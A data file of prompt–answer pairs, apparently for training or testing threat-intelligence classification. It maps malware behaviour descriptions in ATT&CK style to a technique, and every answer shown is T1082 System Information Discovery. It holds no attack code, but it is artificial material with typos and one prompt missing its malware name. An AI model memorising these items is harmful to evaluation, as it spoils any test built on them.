+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot gathers system information, network addresses, disk type, disk free space, and the operation system version.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can fingerprint architecture, computer name, and OS version on the compromised host. Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used commands and API calls to gather system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can enumerate volumes and collect system boot configuration and CPU information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can obtain the computer name and UUID, and enumerate local drives.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has used Systeminfo to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackMould can enumerate local drives on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can enumerate the hostname, domain, and IP of a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brave Prince collects hard drive content and system configuration information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can enumerate the OS version and domain on a targeted system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using /usr/bin/sw_vers -productVersion.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to discover information about the compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has collected the operating system version from the infected system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes collects the victim hostname, window resolution, and Microsoft Windows version.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has collected system information, including the machine name and OS version.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can enumerate the OS version and computer name on a targeted system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme has the ability to list drives and obtain the computer name of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can discover the hostname, computer name, and Windows version of a targeted machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie collects the hostname of the victim machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A system info module in CozyCar gathers information on the victim host’s configuration.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can enumerate the system drives and associated system name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to collect the victim PC name, disk drive information, and operating system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can enumerate local drives, disk type, and disk free space.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has the ability to query device information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can enumerate a victim computer's volume serial number and host name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM can enumerate logical drives on a target system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can collect the computer name, RAM used, and operating system version from the victim’s machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses the Delphi methods Sysutils::DiskSize and GlobalMemoryStatusEx to collect disk size and physical memory as part of the malware's anti-analysis checks for running in a virtualized environment. DarkGate will gather various system information such as display adapter description, operating system type and version, processor type, and RAM amount.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can obtain system information by querying the `Win32_ComputerSystem`, `Win32_BIOS`, `Win32_MotherboardDevice`, `Win32_PnPEntity`, and `Win32_DiskDrive` WMI objects.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can collect the OS version, system architecture, and computer name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis collects OS information and the computer name from the victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can collect the computer name and OS version from the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper collects the victim host name and serial number, and then sends the information to the C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has collected the computer name and OS architecture information from the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook has checked for the presence of Arabic language in the infected machine's settings.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky extracts basic information about the operating system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can obtain the computer name from the victim's system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can perform a language check of the infected system and can query the CPU information (cupid).,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise executes systeminfo after initial communication is made to the remote server.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to execute ver and systeminfo commands.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can enumerate host system information like OS, architecture, domain name, applied patches, and more.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has collected the computer name from the infected host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can collect the user name, Windows version, computer name, and available space on discs from a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus collects the system information, including hostname and OS version, and sends it to the C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious can use GET.WORKSPACE in Microsoft Excel to determine the OS version of the compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher checks if the victim OS is 32 or 64-bit.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Final1stspy obtains victim Microsoft Windows version information and CPU architecture.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can collect the victim's operating system and computer name during the initial infection.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can enumerate all logical drives on a targeted machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has used the command ls /etc | egrep -e""fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"" to determine which Linux OS version is running.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Get2 has the ability to identify the computer name and Windows version of an infected host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon collects endpoint information using the systeminfo command.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has gathered operating system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can collect the computer name and OS version from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT collects the MAC address, computer name, and CPU information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can use `uname` to identify the operating system name, version, and processor type.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can collect the OS, and build version on a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HALFBAKED can obtain information about the OS, processor, and BIOS.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL can collect the OS version, architecture information, and computer name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HELLOKITTY can enumerate logical drives on a target system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has been observed collecting victim machine information like OS version, volume information, and more.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can determine the OS version, bitness, and enumerate physical drives on a targeted host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can enumerate drives on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has collected the host's OS, CPU, and memory information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has the ability to identify the computer name and OS version on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer collects the victim machine’s Windows GUID.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT gathers volume drive information and system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe collects the computer name of the victim's system during the initial infection.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT obtains a build identifier as well as victim hard drive information from Windows registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum. Another JHUHUGIT variant gathers the victim storage volume serial number and the storage device name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can obtain system information such as OS version and disk space.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KARAE can collect system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can collect drive information from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has checked the OS version using `wmic.exe` and the `find` command.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOMPROGO is capable of retrieving information about the infected system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can gather the OS version, architecture information, connected drives, hostname, RAM size, and disk space information from the victim’s machine and has used cmd /c systeminfo command to get a snapshot of the current system state of the target machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can discover logical drive information on compromised hosts.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to obtain a victim's system name and operating system version.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar gathers information on the system and local drives.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has collected the system architecture, OS version, and MAC address information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can enumerate the OS version and hostname of a targeted machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk retrieves the hard disk name by calling the CreateFileA to \\.\PHYSICALDRIVE0 API.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can record the hostname and kernel version of the target machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date /t.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA can check the type of Ivanti VPN device it is running on by executing `first_run()` to identify the first four bytes of the motherboard serial number.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron gathers the victim computer name using the Win32 API call GetComputerName.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can retrieve system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can enumerate the CPUID and BIOS version on a compromised system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower has the ability to list local drives and enumerate the OS architecture.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can collect the computer name from the machine,.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has the ability to discover the computer name and Windows product name/version.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner has monitored CPU usage.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can collect the computer name, system architecture, default language, and processor frequency of a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to retrieve information about the OS.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete collects the hostname of the target computer.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can collect the computer name and enumerate all drives on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can obtain the computer name from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has checked the language of the infected system using the ""GetUSerDefaultUILanguage"" function.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has collected the hostname and operating system version from the compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor has the ability to discover the hostname of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia gathers the hostname and OS version from the victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can enumerate the targeted machine's name and GUID.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke can gather the hostname on a compromised machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MirageFox can collect CPU and architecture information from the victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The initial beacon packet for Mis-Type contains the operating system version and file system of the victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The initial beacon packet for Misdat contains the operating system version of the victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu collects the OS version, computer name, and language ID.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can collect information about the about the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has the capability to gather the OS version and computer name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NDiskMonitor obtains the victim computer name and encrypts the information to send over its C2 channel.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can discover and collect victim system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse conducts multiple system checks and includes these in subsequent ""heartbeat"" messages to the malware's command and control server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI can gather information on drives and the operating system on the victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naid collects a unique identifier (UID) from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu can gather the victim computer name and serial number.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT uses systeminfo on a victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can discover logical drive information including the drive type, free space, and volume information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can collect the OS version and computer name from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can determine the system architecture it is running on to choose which version of the DLL to use.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can obtain the computer name and information on the OS and physical drives from targeted hosts.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo discovers information about the infected machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
